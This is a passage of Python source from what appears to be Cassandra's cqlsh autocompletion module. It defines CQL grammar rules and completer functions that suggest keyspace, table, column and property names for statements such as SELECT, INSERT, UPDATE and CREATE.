| "list" "<" ( <simpleStorageType> | <userType> ) ">"
| "set" "<" ( <simpleStorageType> | <userType> ) ">"
;
<frozenCollectionType> ::= "frozen" "<" "map" "<" <storageType> "," <storageType> ">" ">"
| "frozen" "<" "list" "<" <storageType> ">" ">"
| "frozen" "<" "set" "<" <storageType> ">" ">"
;
<columnFamilyName> ::= ( ksname=<cfOrKsName> dot="." )? cfname=<cfOrKsName> ;
<materializedViewName> ::= ( ksname=<cfOrKsName> dot="." )? mvname=<cfOrKsName> ;
<userTypeName> ::= ( ksname=<cfOrKsName> dot="." )? utname=<cfOrKsName> ;
<keyspaceName> ::= ksname=<cfOrKsName> ;
<nonSystemKeyspaceName> ::= ksname=<cfOrKsName> ;
<alterableKeyspaceName> ::= ksname=<cfOrKsName> ;
<cfOrKsName> ::= <identifier>
| <quotedName>
| <unreservedKeyword>;
<unreservedKeyword> ::= nocomplete=
( "key"
| "clustering"
# | "count" -- to get count(*) completion, treat count as reserved
| "ttl"
| "compact"
| "storage"
| "type"
| "values" )
;
<property> ::= [propname]=<cident> propeq="=" [propval]=<propertyValue>
;
<propertyValue> ::= propsimpleval=( <stringLiteral>
| <identifier>
| <integer>
| <float>
| <unreservedKeyword> )
# we don't use <mapLiteral> here so we can get more targeted
# completions:
| propsimpleval="{" [propmapkey]=<term> ":" [propmapval]=<term>
( ender="," [propmapkey]=<term> ":" [propmapval]=<term> )*
ender="}"
;
'''
def prop_equals_completer(ctxt, cass):
if not working_on_keyspace(ctxt):
# we know if the thing in the property name position is "compact" or
# "clustering" that there won't actually be an equals sign, because
# there are no properties by those names. there are, on the other hand,
# table properties that start with those keywords which don't have
# equals signs at all.
curprop = ctxt.get_binding('propname')[-1].upper()
if curprop in ('COMPACT', 'CLUSTERING'):
return ()
return ['=']
completer_for('property', 'propeq')(prop_equals_completer)
@completer_for('property', 'propname')
def prop_name_completer(ctxt, cass):
if working_on_keyspace(ctxt):
return ks_prop_name_completer(ctxt, cass)
else:
return cf_prop_name_completer(ctxt, cass)
@completer_for('propertyValue', 'propsimpleval')
def prop_val_completer(ctxt, cass):
if working_on_keyspace(ctxt):
return ks_prop_val_completer(ctxt, cass)
else:
return cf_prop_val_completer(ctxt, cass)
@completer_for('propertyValue', 'propmapkey')
def prop_val_mapkey_completer(ctxt, cass):
if working_on_keyspace(ctxt):
return ks_prop_val_mapkey_completer(ctxt, cass)
else:
return cf_prop_val_mapkey_completer(ctxt, cass)
@completer_for('propertyValue', 'propmapval')
def prop_val_mapval_completer(ctxt, cass):
if working_on_keyspace(ctxt):
return ks_prop_val_mapval_completer(ctxt, cass)
else:
return cf_prop_val_mapval_completer(ctxt, cass)
@completer_for('propertyValue', 'ender')
def prop_val_mapender_completer(ctxt, cass):
if working_on_keyspace(ctxt):
return ks_prop_val_mapender_completer(ctxt, cass)
else:
return cf_prop_val_mapender_completer(ctxt, cass)
def ks_prop_name_completer(ctxt, cass):
optsseen = ctxt.get_binding('propname', ())
if 'replication' not in optsseen:
return ['replication']
return ["durable_writes"]
def ks_prop_val_completer(ctxt, cass):
optname = ctxt.get_binding('propname')[-1]
if optname == 'durable_writes':
return ["'true'", "'false'"]
if optname == 'replication':
return ["{'class': '"]
return ()
def ks_prop_val_mapkey_completer(ctxt, cass):
optname = ctxt.get_binding('propname')[-1]
if optname != 'replication':
return ()
keysseen = map(dequote_value, ctxt.get_binding('propmapkey', ()))
valsseen = map(dequote_value, ctxt.get_binding('propmapval', ()))
for k, v in zip(keysseen, valsseen):
if k == 'class':
repclass = v
break
else:
return ["'class'"]
if repclass in CqlRuleSet.replication_factor_strategies:
opts = set(('replication_factor',))
elif repclass == 'NetworkTopologyStrategy':
return [Hint('<dc_name>')]
return map(escape_value, opts.difference(keysseen))
def ks_prop_val_mapval_completer(ctxt, cass):
optname = ctxt.get_binding('propname')[-1]
if optname != 'replication':
return ()
currentkey = dequote_value(ctxt.get_binding('propmapkey')[-1])
if currentkey == 'class':
return map(escape_value, CqlRuleSet.replication_strategies)
return [Hint('<term>')]
def ks_prop_val_mapender_completer(ctxt, cass):
optname = ctxt.get_binding('propname')[-1]
if optname != 'replication':
return [',']
keysseen = map(dequote_value, ctxt.get_binding('propmapkey', ()))
valsseen = map(dequote_value, ctxt.get_binding('propmapval', ()))
for k, v in zip(keysseen, valsseen):
if k == 'class':
repclass = v
break
else:
return [',']
if repclass in CqlRuleSet.replication_factor_strategies:
if 'replication_factor' not in keysseen:
return [',']
if repclass == 'NetworkTopologyStrategy' and len(keysseen) == 1:
return [',']
return ['}']
def cf_prop_name_completer(ctxt, cass):
return [c[0] for c in (CqlRuleSet.columnfamily_layout_options +
CqlRuleSet.columnfamily_layout_map_options)]
def cf_prop_val_completer(ctxt, cass):
exist_opts = ctxt.get_binding('propname')
this_opt = exist_opts[-1]
if this_opt == 'compression':
return ["{'sstable_compression': '"]
if this_opt == 'compaction':
return ["{'class': '"]
if this_opt == 'caching':
return ["{'keys': '"]
if any(this_opt == opt[0] for opt in CqlRuleSet.obsolete_cf_options):
return ["'<obsolete_option>'"]
if this_opt in ('read_repair_chance', 'bloom_filter_fp_chance',
'dclocal_read_repair_chance'):
return [Hint('<float_between_0_and_1>')]
if this_opt in ('min_compaction_threshold', 'max_compaction_threshold',
'gc_grace_seconds', 'min_index_interval', 'max_index_interval'):
return [Hint('<integer>')]
if this_opt in ('cdc'):
return [Hint('<true|false>')]
return [Hint('<option_value>')]
def cf_prop_val_mapkey_completer(ctxt, cass):
optname = ctxt.get_binding('propname')[-1]
for cql3option, _, subopts in CqlRuleSet.columnfamily_layout_map_options:
if optname == cql3option:
break
else:
return ()
keysseen = map(dequote_value, ctxt.get_binding('propmapkey', ()))
valsseen = map(dequote_value, ctxt.get_binding('propmapval', ()))
pairsseen = dict(zip(keysseen, valsseen))
if optname == 'compression':
return map(escape_value, set(subopts).difference(keysseen))
if optname == 'caching':
return map(escape_value, set(subopts).difference(keysseen))
if optname == 'compaction':
opts = set(subopts)
try:
csc = pairsseen['class']
except KeyError:
return ["'class'"]
csc = csc.split('.')[-1]
if csc == 'SizeTieredCompactionStrategy':
opts = opts.union(set(CqlRuleSet.size_tiered_compaction_strategy_options))
elif csc == 'LeveledCompactionStrategy':
opts = opts.union(set(CqlRuleSet.leveled_compaction_strategy_options))
elif csc == 'DateTieredCompactionStrategy':
opts = opts.union(set(CqlRuleSet.date_tiered_compaction_strategy_options))
elif csc == 'TimeWindowCompactionStrategy':
opts = opts.union(set(CqlRuleSet.time_window_compaction_strategy_options))
return map(escape_value, opts)
return ()
def cf_prop_val_mapval_completer(ctxt, cass):
opt = ctxt.get_binding('propname')[-1]
key = dequote_value(ctxt.get_binding('propmapkey')[-1])
if opt == 'compaction':
if key == 'class':
return map(escape_value, CqlRuleSet.available_compaction_classes)
return [Hint('<option_value>')]
elif opt == 'compression':
if key == 'sstable_compression':
return map(escape_value, CqlRuleSet.available_compression_classes)
return [Hint('<option_value>')]
elif opt == 'caching':
if key == 'rows_per_partition':
return ["'ALL'", "'NONE'", Hint('#rows_per_partition')]
elif key == 'keys':
return ["'ALL'", "'NONE'"]
return ()
def cf_prop_val_mapender_completer(ctxt, cass):
return [',', '}']
@completer_for('tokenDefinition', 'token')
def token_word_completer(ctxt, cass):
return ['token(']
@completer_for('simpleStorageType', 'typename')
def storagetype_completer(ctxt, cass):
return simple_cql_types
@completer_for('keyspaceName', 'ksname')
def ks_name_completer(ctxt, cass):
return map(maybe_escape_name, cass.get_keyspace_names())
@completer_for('nonSystemKeyspaceName', 'ksname')
def non_system_ks_name_completer(ctxt, cass):
ksnames = [n for n in cass.get_keyspace_names() if n not in SYSTEM_KEYSPACES]
return map(maybe_escape_name, ksnames)
@completer_for('alterableKeyspaceName', 'ksname')
def alterable_ks_name_completer(ctxt, cass):
ksnames = [n for n in cass.get_keyspace_names() if n not in NONALTERBALE_KEYSPACES]
return map(maybe_escape_name, ksnames)
def cf_ks_name_completer(ctxt, cass):
return [maybe_escape_name(ks) + '.' for ks in cass.get_keyspace_names()]
completer_for('columnFamilyName', 'ksname')(cf_ks_name_completer)
completer_for('materializedViewName', 'ksname')(cf_ks_name_completer)
def cf_ks_dot_completer(ctxt, cass):
name = dequote_name(ctxt.get_binding('ksname'))
if name in cass.get_keyspace_names():
return ['.']
return []
completer_for('columnFamilyName', 'dot')(cf_ks_dot_completer)
completer_for('materializedViewName', 'dot')(cf_ks_dot_completer)
@completer_for('columnFamilyName', 'cfname')
def cf_name_completer(ctxt, cass):
ks = ctxt.get_binding('ksname', None)
if ks is not None:
ks = dequote_name(ks)
try:
cfnames = cass.get_columnfamily_names(ks)
except Exception:
if ks is None:
return ()
raise
return map(maybe_escape_name, cfnames)
@completer_for('materializedViewName', 'mvname')
def mv_name_completer(ctxt, cass):
ks = ctxt.get_binding('ksname', None)
if ks is not None:
ks = dequote_name(ks)
try:
mvnames = cass.get_materialized_view_names(ks)
except Exception:
if ks is None:
return ()
raise
return map(maybe_escape_name, mvnames)
completer_for('userTypeName', 'ksname')(cf_ks_name_completer)
completer_for('userTypeName', 'dot')(cf_ks_dot_completer)
def ut_name_completer(ctxt, cass):
ks = ctxt.get_binding('ksname', None)
if ks is not None:
ks = dequote_name(ks)
try:
utnames = cass.get_usertype_names(ks)
except Exception:
if ks is None:
return ()
raise
return map(maybe_escape_name, utnames)
completer_for('userTypeName', 'utname')(ut_name_completer)
completer_for('userType', 'utname')(ut_name_completer)
@completer_for('unreservedKeyword', 'nocomplete')
def unreserved_keyword_completer(ctxt, cass):
# we never want to provide completions through this production;
# this is always just to allow use of some keywords as column
# names, CF names, property values, etc.
return ()
def get_table_meta(ctxt, cass):
ks = ctxt.get_binding('ksname', None)
if ks is not None:
ks = dequote_name(ks)
cf = dequote_name(ctxt.get_binding('cfname'))
return cass.get_table_meta(ks, cf)
def get_ut_layout(ctxt, cass):
ks = ctxt.get_binding('ksname', None)
if ks is not None:
ks = dequote_name(ks)
ut = dequote_name(ctxt.get_binding('utname'))
return cass.get_usertype_layout(ks, ut)
def working_on_keyspace(ctxt):
wat = ctxt.get_binding('wat').upper()
if wat in ('KEYSPACE', 'SCHEMA'):
return True
return False
syntax_rules += r'''
<useStatement> ::= "USE" <keyspaceName>
;
<selectStatement> ::= "SELECT" ( "JSON" )? <selectClause>
"FROM" (cf=<columnFamilyName> | mv=<materializedViewName>)
( "WHERE" <whereClause> )?
( "GROUP" "BY" <groupByClause> ( "," <groupByClause> )* )?
( "ORDER" "BY" <orderByClause> ( "," <orderByClause> )* )?
( "PER" "PARTITION" "LIMIT" perPartitionLimit=<wholenumber> )?
( "LIMIT" limit=<wholenumber> )?
( "ALLOW" "FILTERING" )?
;
<whereClause> ::= <relation> ( "AND" <relation> )*
;
<relation> ::= [rel_lhs]=<cident> ( "[" <term> "]" )? ( "=" | "<" | ">" | "<=" | ">=" | "CONTAINS" ( "KEY" )? ) <term>
| token="TOKEN" "(" [rel_tokname]=<cident>
( "," [rel_tokname]=<cident> )*
")" ("=" | "<" | ">" | "<=" | ">=") <tokenDefinition>
| [rel_lhs]=<cident> "IN" "(" <term> ( "," <term> )* ")"
;
<selectClause> ::= "DISTINCT"? <selector> ("AS" <cident>)? ("," <selector> ("AS" <cident>)?)*
| "*"
;
<udtSubfieldSelection> ::= <identifier> "." <identifier>
;
<selector> ::= [colname]=<cident>
| <udtSubfieldSelection>
| "WRITETIME" "(" [colname]=<cident> ")"
| "TTL" "(" [colname]=<cident> ")"
| "COUNT" "(" star=( "*" | "1" ) ")"
| "CAST" "(" <selector> "AS" <storageType> ")"
| <functionName> <selectionFunctionArguments>
| <term>
;
<selectionFunctionArguments> ::= "(" ( <selector> ( "," <selector> )* )? ")"
;
<orderByClause> ::= [ordercol]=<cident> ( "ASC" | "DESC" )?
;
<groupByClause> ::= [groupcol]=<cident>
;
'''
def udf_name_completer(ctxt, cass):
ks = ctxt.get_binding('ksname', None)
if ks is not None:
ks = dequote_name(ks)
try:
udfnames = cass.get_userfunction_names(ks)
except Exception:
if ks is None:
return ()
raise
return map(maybe_escape_name, udfnames)
def uda_name_completer(ctxt, cass):
ks = ctxt.get_binding('ksname', None)
if ks is not None:
ks = dequote_name(ks)
try:
udanames = cass.get_useraggregate_names(ks)
except Exception:
if ks is None:
return ()
raise
return map(maybe_escape_name, udanames)
def udf_uda_name_completer(ctxt, cass):
ks = ctxt.get_binding('ksname', None)
if ks is not None:
ks = dequote_name(ks)
try:
functionnames = cass.get_userfunction_names(ks) + cass.get_useraggregate_names(ks)
except Exception:
if ks is None:
return ()
raise
return map(maybe_escape_name, functionnames)
def ref_udf_name_completer(ctxt, cass):
try:
udanames = cass.get_userfunction_names(None)
except Exception:
return ()
return map(maybe_escape_name, udanames)
completer_for('functionAggregateName', 'ksname')(cf_ks_name_completer)
completer_for('functionAggregateName', 'dot')(cf_ks_dot_completer)
completer_for('functionAggregateName', 'functionname')(udf_uda_name_completer)
completer_for('anyFunctionName', 'ksname')(cf_ks_name_completer)
completer_for('anyFunctionName', 'dot')(cf_ks_dot_completer)
completer_for('anyFunctionName', 'udfname')(udf_name_completer)
completer_for('userFunctionName', 'ksname')(cf_ks_name_completer)
completer_for('userFunctionName', 'dot')(cf_ks_dot_completer)
completer_for('userFunctionName', 'udfname')(udf_name_completer)
completer_for('refUserFunctionName', 'udfname')(ref_udf_name_completer)
completer_for('userAggregateName', 'ksname')(cf_ks_name_completer)
completer_for('userAggregateName', 'dot')(cf_ks_dot_completer)
completer_for('userAggregateName', 'udaname')(uda_name_completer)
@completer_for('orderByClause', 'ordercol')
def select_order_column_completer(ctxt, cass):
prev_order_cols = ctxt.get_binding('ordercol', ())
keyname = ctxt.get_binding('keyname')
if keyname is None:
keyname = ctxt.get_binding('rel_lhs', ())
if not keyname:
return [Hint("Can't ORDER BY here: need to specify partition key in WHERE clause")]
layout = get_table_meta(ctxt, cass)
order_by_candidates = [col.name for col in layout.clustering_key]
if len(order_by_candidates) > len(prev_order_cols):
return [maybe_escape_name(order_by_candidates[len(prev_order_cols)])]
return [Hint('No more orderable columns here.')]
@completer_for('groupByClause', 'groupcol')
def select_group_column_completer(ctxt, cass):
prev_group_cols = ctxt.get_binding('groupcol', ())
layout = get_table_meta(ctxt, cass)
group_by_candidates = [col.name for col in layout.primary_key]
if len(group_by_candidates) > len(prev_group_cols):
return [maybe_escape_name(group_by_candidates[len(prev_group_cols)])]
return [Hint('No more columns here.')]
@completer_for('relation', 'token')
def relation_token_word_completer(ctxt, cass):
return ['TOKEN(']
@completer_for('relation', 'rel_tokname')
def relation_token_subject_completer(ctxt, cass):
layout = get_table_meta(ctxt, cass)
return [key.name for key in layout.partition_key]
@completer_for('relation', 'rel_lhs')
def select_relation_lhs_completer(ctxt, cass):
layout = get_table_meta(ctxt, cass)
filterable = set()
already_filtered_on = map(dequote_name, ctxt.get_binding('rel_lhs', ()))
for num in range(0, len(layout.partition_key)):
if num == 0 or layout.partition_key[num - 1].name in already_filtered_on:
filterable.add(layout.partition_key[num].name)
else:
break
for num in range(0, len(layout.clustering_key)):
if num == 0 or layout.clustering_key[num - 1].name in already_filtered_on:
filterable.add(layout.clustering_key[num].name)
else:
break
for idx in layout.indexes.itervalues():
filterable.add(idx.index_options["target"])
return map(maybe_escape_name, filterable)
explain_completion('selector', 'colname')
syntax_rules += r'''
<insertStatement> ::= "INSERT" "INTO" cf=<columnFamilyName>
( ( "(" [colname]=<cident> ( "," [colname]=<cident> )* ")"
"VALUES" "(" [newval]=<term> ( valcomma="," [newval]=<term> )* valcomma=")")
| ("JSON" <stringLiteral>))
( "IF" "NOT" "EXISTS")?
( "USING" [insertopt]=<usingOption>
( "AND" [insertopt]=<usingOption> )* )?
;
<usingOption> ::= "TIMESTAMP" <wholenumber>
| "TTL" <wholenumber>
;
'''
def regular_column_names(table_meta):
if not table_meta or not table_meta.columns:
return []
regular_columns = list(set(table_meta.columns.keys()) -
set([key.name for key in table_meta.partition_key]) -
set([key.name for key in table_meta.clustering_key]))
return regular_columns
@completer_for('insertStatement', 'colname')
def insert_colname_completer(ctxt, cass):
layout = get_table_meta(ctxt, cass)
colnames = set(map(dequote_name, ctxt.get_binding('colname', ())))
keycols = layout.primary_key
for k in keycols:
if k.name not in colnames:
return [maybe_escape_name(k.name)]
normalcols = set(regular_column_names(layout)) - colnames
return map(maybe_escape_name, normalcols)
@completer_for('insertStatement', 'newval')
def insert_newval_completer(ctxt, cass):
layout = get_table_meta(ctxt, cass)
insertcols = map(dequote_name, ctxt.get_binding('colname'))
valuesdone = ctxt.get_binding('newval', ())
if len(valuesdone) >= len(insertcols):
return []
curcol = insertcols[len(valuesdone)]
coltype = layout.columns[curcol].cql_type
if coltype in ('map', 'set'):
return ['{']
if coltype == 'list':
return ['[']
if coltype == 'boolean':
return ['true', 'false']
return [Hint('<value for %s (%s)>' % (maybe_escape_name(curcol),
coltype))]
@completer_for('insertStatement', 'valcomma')
def insert_valcomma_completer(ctxt, cass):
numcols = len(ctxt.get_binding('colname', ()))
numvals = len(ctxt.get_binding('newval', ()))
if numcols > numvals:
return [',']
return [')']
@completer_for('insertStatement', 'insertopt')
def insert_option_completer(ctxt, cass):
opts = set('TIMESTAMP TTL'.split())
for opt in ctxt.get_binding('insertopt', ()):
opts.discard(opt.split()[0])
return opts
syntax_rules += r'''
<updateStatement> ::= "UPDATE" cf=<columnFamilyName>
( "USING" [updateopt]=<usingOption>
( "AND" [updateopt]=<usingOption> )* )?
"SET" <assignment> ( "," <assignment> )*
"WHERE" <whereClause>
( "IF" ( "EXISTS" | <conditions> ))?
;
<assignment> ::= updatecol=<cident>
(( "=" update_rhs=( <term> | <cident> )
( counterop=( "+" | "-" ) inc=<wholenumber>
| listadder="+" listcol=<cident> )? )
| ( indexbracket="[" <term> "]" "=" <term> )
| ( udt_field_dot="." udt_field=<identifier> "=" <term> ))
;
<conditions> ::= <condition> ( "AND" <condition> )*
;
<condition_op_and_rhs> ::= (("=" | "<" | ">" | "<=" | ">=" | "!=") <term>)
| ("IN" "(" <term> ( "," <term> )* ")" )
;
<condition> ::= conditioncol=<cident>
( (( indexbracket="[" <term> "]" )
|( udt_field_dot="." udt_field=<identifier> )) )?
<condition_op_and_rhs>
;
'''
@completer_for('updateStatement', 'updateopt')
def update_option_completer(ctxt, cass):
opts = set('TIMESTAMP TTL'.split())
for opt in ctxt.get_binding('updateopt', ()):
opts.discard(opt.split()[0])
return opts
@completer_for('assignment', 'updatecol')
def update_col_completer(ctxt, cass):
layout = get_table_meta(ctxt, cass)
return map(maybe_escape_name, regular_column_names(layout))
@completer_for('assignment', 'update_rhs')
def update_countername_completer(ctxt, cass):
layout = get_table_meta(ctxt, cass)
curcol = dequote_name(ctxt.get_binding('updatecol', ''))
coltype = layout.columns[curcol].cql_type
if coltype == 'counter':
return [maybe_escape_name(curcol)]
if coltype in ('map', 'set'):
return ["{"]
if coltype == 'list':
return ["["]
return [Hint('<term (%s)>' % coltype)]
@completer_for('assignment', 'counterop')
def update_counterop_completer(ctxt, cass):
layout = get_table_meta(ctxt, cass)
curcol = dequote_name(ctxt.get_binding('updatecol', ''))
return ['+', '-'] if layout.columns[curcol].cql_type == 'counter' else []
@completer_for('assignment', 'inc')
def update_counter_inc_completer(ctxt, cass):
layout = get_table_meta(ctxt, cass)
curcol = dequote_name(ctxt.get_binding('updatecol', ''))
if layout.columns[curcol].cql_type == 'counter':
return [Hint('<wholenumber>')]
return []
@completer_for('assignment', 'listadder')
def update_listadder_completer(ctxt, cass):
rhs = ctxt.get_binding('update_rhs')
if rhs.startswith('['):
return ['+']
return []
@completer_for('assignment', 'listcol')
def update_listcol_completer(ctxt, cass):
rhs = ctxt.get_binding('update_rhs')
if rhs.startswith('['):
colname = dequote_name(ctxt.get_binding('updatecol'))
return [maybe_escape_name(colname)]
return []
@completer_for('assignment', 'indexbracket')
def update_indexbracket_completer(ctxt, cass):
layout = get_table_meta(ctxt, cass)
curcol = dequote_name(ctxt.get_binding('updatecol', ''))
coltype = layout.columns[curcol].cql_type
if coltype in ('map', 'list'):
return ['[']
return []
@completer_for('assignment', 'udt_field_dot')
def update_udt_field_dot_completer(ctxt, cass):
layout = get_table_meta(ctxt, cass)
curcol = dequote_name(ctxt.get_binding('updatecol', ''))
return ["."] if _is_usertype(layout, curcol) else []
@completer_for('assignment', 'udt_field')
def assignment_udt_field_completer(ctxt, cass):
layout = get_table_meta(ctxt, cass)
curcol = dequote_name(ctxt.get_binding('updatecol', ''))
return _usertype_fields(ctxt, cass, layout, curcol)
def _is_usertype(layout, curcol):
coltype = layout.columns[curcol].cql_type
return coltype not in simple_cql_types and coltype not in ('map', 'set', 'list')
def _usertype_fields(ctxt, cass, layout, curcol):
if not _is_usertype(layout, curcol):
return []
coltype = layout.columns[curcol].cql_type
ks = ctxt.get_binding('ksname', None)
if ks is not None:
ks = dequote_name(ks)
user_type = cass.get_usertype_layout(ks, coltype)
return [field_name for (field_name, field_type) in user_type]
@completer_for('condition', 'indexbracket')
def condition_indexbracket_completer(ctxt, cass):
layout = get_table_meta(ctxt, cass)
curcol = dequote_name(ctxt.get_binding('conditioncol', ''))
coltype = layout.columns[curcol].cql_type
if coltype in ('map', 'list'):
return ['[']
return []
@completer_for('condition', 'udt_field_dot')
def condition_udt_field_dot_completer(ctxt, cass):
layout = get_table_meta(ctxt, cass)
curcol = dequote_name(ctxt.get_binding('conditioncol', ''))
return ["."] if _is_usertype(layout, curcol) else []
@completer_for('condition', 'udt_field')
def condition_udt_field_completer(ctxt, cass):
layout = get_table_meta(ctxt, cass)
curcol = dequote_name(ctxt.get_binding('conditioncol', ''))
return _usertype_fields(ctxt, cass, layout, curcol)
syntax_rules += r'''
<deleteStatement> ::= "DELETE" ( <deleteSelector> ( "," <deleteSelector> )* )?
"FROM" cf=<columnFamilyName>
( "USING" [delopt]=<deleteOption> )?
"WHERE" <whereClause>
( "IF" ( "EXISTS" | <conditions> ) )?
;
<deleteSelector> ::= delcol=<cident>
( ( "[" <term> "]" )
| ( "." <identifier> ) )?
;
<deleteOption> ::= "TIMESTAMP" <wholenumber>
;
'''
@completer_for('deleteStatement', 'delopt')
def delete_opt_completer(ctxt, cass):
opts = set('TIMESTAMP'.split())
for opt in ctxt.get_binding('delopt', ()):
opts.discard(opt.split()[0])
return opts
@completer_for('deleteSelector', 'delcol')
def delete_delcol_completer(ctxt, cass):
layout = get_table_meta(ctxt, cass)
return map(maybe_escape_name, regular_column_names(layout))
syntax_rules += r'''
<batchStatement> ::= "BEGIN" ( "UNLOGGED" | "COUNTER" )? "BATCH"
( "USING" [batchopt]=<usingOption>
( "AND" [batchopt]=<usingOption> )* )?
[batchstmt]=<batchStatementMember> ";"?
( [batchstmt]=<batchStatementMember> ";"? )*
"APPLY" "BATCH"
;
<batchStatementMember> ::= <insertStatement>
| <updateStatement>
| <deleteStatement>
;
'''
@completer_for('batchStatement', 'batchopt')
def batch_opt_completer(ctxt, cass):
opts = set('TIMESTAMP'.split())
for opt in ctxt.get_binding('batchopt', ()):
opts.discard(opt.split()[0])
return opts
syntax_rules += r'''
<truncateStatement> ::= "TRUNCATE" ("COLUMNFAMILY" | "TABLE")? cf=<columnFamilyName>
;
'''
syntax_rules += r'''
<createKeyspaceStatement> ::= "CREATE" wat=( "KEYSPACE" | "SCHEMA" ) ("IF" "NOT" "EXISTS")? ksname=<cfOrKsName>
"WITH" <property> ( "AND" <property> )*
;
'''
@completer_for('createKeyspaceStatement', 'wat')
def create_ks_wat_completer(ctxt, cass):
# would prefer to get rid of the "schema" nomenclature in cql3
if ctxt.get_binding('partial', '') == '':
return ['KEYSPACE']
return ['KEYSPACE', 'SCHEMA']
syntax_rules += r'''
<createColumnFamilyStatement> ::= "CREATE" wat=( "COLUMNFAMILY" | "TABLE" ) ("IF" "NOT" "EXISTS")?
( ks=<nonSystemKeyspaceName> dot="." )? cf=<cfOrKsName>
"(" ( <singleKeyCfSpec> | <compositeKeyCfSpec> ) ")"
( "WITH" <cfamProperty> ( "AND" <cfamProperty> )* )?
;
<cfamProperty> ::= <property>
| "COMPACT" "STORAGE" "CDC"
| "CLUSTERING" "ORDER" "BY" "(" <cfamOrdering>
( "," <cfamOrdering> )* ")"
;
<cfamOrdering> ::= [ordercol]=<cident> ( "ASC" | "DESC" )
;
<singleKeyCfSpec> ::= [newcolname]=<cident> <storageType> "PRIMARY" "KEY"
( "," [newcolname]=<cident> <storageType> )*
;
<compositeKeyCfSpec> ::= [newcolname]=<cident> <storageType>
"," [newcolname]=<cident> <storageType> ( "static" )?
( "," [newcolname]=<cident> <storageType> ( "static" )? )*
"," "PRIMARY" k="KEY" p="(" ( partkey=<pkDef> | [pkey]=<cident> )
( c="," [pkey]=<cident> )* ")"
;
<pkDef> ::= "(" [ptkey]=<cident> "," [ptkey]=<cident>
( "," [ptkey]=<cident> )* ")"
;
'''
@completer_for('cfamOrdering', 'ordercol')
def create_cf_clustering_order_colname_completer(ctxt, cass):
colnames = map(dequote_name, ctxt.get_binding('newcolname', ()))
# Definitely some of these aren't valid for ordering, but I'm not sure
# precisely which are. This is good enough for now
return colnames
@completer_for('createColumnFamilyStatement', 'wat')
def create_cf_wat_completer(ctxt, cass):
# would prefer to get rid of the "columnfamily" nomenclature in cql3
if ctxt.get_binding('partial', '') == '':
return ['TABLE']
return ['TABLE', 'COLUMNFAMILY']
explain_completion('createColumnFamilyStatement', 'cf', '<new_table_name>')
explain_completion('compositeKeyCfSpec', 'newcolname', '<new_column_name>')
@completer_for('createColumnFamilyStatement', 'dot')
def create_cf_ks_dot_completer(ctxt, cass):
ks = dequote_name(ctxt.get_binding('ks'))
if ks in cass.get_keyspace_names():
return ['.']
return []
@completer_for('pkDef', 'ptkey')
def create_cf_pkdef_declaration_completer(ctxt, cass):
cols_declared = ctxt.get_binding('newcolname')
pieces_already = ctxt.get_binding('ptkey', ())
pieces_already = map(dequote_name, pieces_already)
while cols_declared[0] in pieces_already:
cols_declared = cols_declared[1:]
if len(cols_declared) < 2:
return ()
return [maybe_escape_name(cols_declared[0])]
@completer_for('compositeKeyCfSpec', 'pkey')
def create_cf_composite_key_declaration_completer(ctxt, cass):
cols_declared = ctxt.get_binding('newcolname')
pieces_already = ctxt.get_binding('ptkey', ()) + ctxt.get_binding('pkey', ())
pieces_already = map(dequote_name, pieces_already)
while cols_declared[0] in pieces_already:
cols_declared = cols_declared[1:]
if len(cols_declared) < 2:
return ()
return [maybe_escape_name(cols_declared[0])]
@completer_for('compositeKeyCfSpec', 'k')
def create_cf_composite_primary_key_keyword_completer(ctxt, cass):
return ['KEY (']
@completer_for('compositeKeyCfSpec', 'p')
def create_cf_composite_primary_key_paren_completer(ctxt, cass):
return ['(']
@completer_for('compositeKeyCfSpec', 'c')
def create_cf_composite_primary_key_comma_completer(ctxt, cass):
cols_declared = ctxt.get_binding('newcolname')
pieces_already = ctxt.get_binding('pkey', ())
if len(pieces_already) >= len(cols_declared) - 1:
return ()
return [',']
syntax_rules += r'''
<idxName> ::= <identifier>
| <quotedName>
| <unreservedKeyword>;
<createIndexStatement> ::= "CREATE" "CUSTOM"? "INDEX" ("IF" "NOT" "EXISTS")? indexname=<idxName>? "ON"
cf=<columnFamilyName> "(" (
col=<cident> |
"keys(" col=<cident> ")" |
"full(" col=<cident> ")"
) ")"
( "USING" <stringLiteral> ( "WITH" "OPTIONS" "=" <mapLiteral> )? )?
;
<createMaterializedViewStatement> ::= "CREATE" "MATERIALIZED" "VIEW" ("IF" "NOT" "EXISTS")? <materializedViewName>?
"AS" <selectStatement>
"PRIMARY" "KEY" <pkDef>
;
<createUserTypeStatement> ::= "CREATE" "TYPE" ( ks=<nonSystemKeyspaceName> dot="." )? typename=<cfOrKsName> "(" newcol=<cident> <storageType>
( "," [newcolname]=<cident> <storageType> )*
")"
;
<createFunctionStatement> ::= "CREATE" ("OR" "REPLACE")? "FUNCTION"
("IF" "NOT" "EXISTS")?
<userFunctionName>
( "(" ( newcol=<cident> <storageType>
( "," [newcolname]=<cident> <storageType> )* )?
")" )?
("RETURNS" "NULL" | "CALLED") "ON" "NULL" "INPUT"
"RETURNS" <storageType>
"LANGUAGE" <cident> "AS" <stringLiteral>
;
<createAggregateStatement> ::= "CREATE" ("OR" "REPLACE")? "AGGREGATE"
("IF" "NOT" "EXISTS")?
<userAggregateName>
( "("
( <storageType> ( "," <storageType> )* )?
")" )?
"SFUNC" <refUserFunctionName>
"STYPE" <storageType>
( "FINALFUNC" <refUserFunctionName> )?
( "INITCOND" <term> )?
;
'''
explain_completion('createIndexStatement', 'indexname', '<new_index_name>')
explain_completion('createUserTypeStatement', 'typename', '<new_type_name>')
explain_completion('createUserTypeStatement', 'newcol', '<new_field_name>')
@completer_for('createIndexStatement', 'col')
def create_index_col_completer(ctxt, cass):
""" Return the columns for which an index doesn't exist yet. """
layout = get_table_meta(ctxt, cass)
idx_targets = [idx.index_options["target"] for idx in layout.indexes.itervalues()]
colnames = [cd.name for cd in layout.columns.values() if cd.name not in idx_targets]
return map(maybe_escape_name, colnames)
syntax_rules += r'''
<dropKeyspaceStatement> ::= "DROP" "KEYSPACE" ("IF" "EXISTS")? ksname=<nonSystemKeyspaceName>
;
<dropColumnFamilyStatement> ::= "DROP" ( "COLUMNFAMILY" | "TABLE" ) ("IF" "EXISTS")? cf=<columnFamilyName>
;
<indexName> ::= ( ksname=<idxOrKsName> dot="." )? idxname=<idxOrKsName> ;
<idxOrKsName> ::= <identifier>
| <quotedName>
| <unreservedKeyword>;
<dropIndexStatement> ::= "DROP" "INDEX" ("IF" "EXISTS")? idx=<indexName>
;
<dropMaterializedViewStatement> ::= "DROP" "MATERIALIZED" "VIEW" ("IF" "EXISTS")? mv=<materializedViewName>
;
